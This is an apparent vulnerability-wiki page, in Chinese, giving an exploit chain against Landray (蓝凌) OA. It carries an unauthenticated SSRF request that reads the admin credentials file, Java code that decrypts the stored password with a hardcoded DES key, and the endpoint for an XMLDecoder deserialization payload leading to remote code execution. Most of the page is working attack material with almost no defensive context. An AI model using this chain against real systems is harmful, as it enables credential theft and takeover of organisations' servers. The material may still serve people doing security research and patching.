menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right --Vulnerability-main chevron_right 蓝凌OA 前台 SSRF 到 RCE.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    蓝凌OA 前台 SSRF 到 RCE.md
    1.37 KB / 2021-05-21 09:14:38
        # 蓝凌OA 前台 SSRF 到 RCE
    
    详情分析可以见:https://mp.weixin.qq.com/s/fNovp4mbKIMkVdF2ywcQcQ
    
    SSRF 漏洞位置: /sys/ui/extend/varkind/custom.jsp
    
    读password:
    
    
    ```
    POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
    Host: 
    ...
    
    var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}
    ```
    
    解密:
    
    
    ```
    import com.landray.kmss.util.DESEncrypt;
    
    public class main {
        public static void main(String[] args) {
            String password = "mqwEyqHLj9PQXpy+yhf4z92SejWx+VeS";
            String resul=doPasswordDecrypt(password);
            System.out.println(resul);
    
        }
        public static String doPasswordDecrypt(String password) {
            try {
                DESEncrypt des = new DESEncrypt("kmssAdminKey");
                return des.decryptString(password);
            } catch (Exception ex) {
                try {
                    DESEncrypt des0 = new DESEncrypt("kmssAdminKey", true);
                    return des0.decryptString(password);
                } catch (Exception e) {
                    return "ヾノ≧∀≦)o";
                }
            }
        }
    }
    
    ```
    
    解密后得到明文密码登录后使用xmldecoder反序列化.
    
    
    ```
    /sys/search/sys_search_main/sysSearchMain.do?method=editParam&fdParemNames=11&fdParameters=<payload>
    ```
    
    XMLDecoder-payload-generator生成payload: https://github.com/mhaskar/XMLDecoder-payload-generator
    
    from:https://mp.weixin.qq.com/s/fNovp4mbKIMkVdF2ywcQcQ
    
    links
    file_download